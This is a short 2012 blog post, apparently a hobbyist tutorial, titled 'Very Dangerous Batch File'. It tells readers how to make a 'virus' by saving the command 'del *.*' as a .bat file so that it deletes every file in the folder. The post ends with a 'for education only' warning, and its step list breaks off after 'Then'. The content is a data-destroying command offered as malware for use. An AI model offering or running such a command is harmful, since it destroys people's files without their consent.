- Back to Home »
- Tutorials »
- Very Dangerous Batch File
Posted by : Unknown
Thứ Bảy, 26 tháng 5, 2012
This is a very short tutorial describing how to make a very simple batch virus which consists of only 7 characters.
This virus will delete every file with any file extension.
Code:
del *.*
2 Easy Steps to Turn It Into a Virus
- Type that into notepad.
- Save the file as a ".bat".
Then
WARNING: THIS IS FOR EDUCATION ONLY. USE IT AT YOUR OWN RISK!

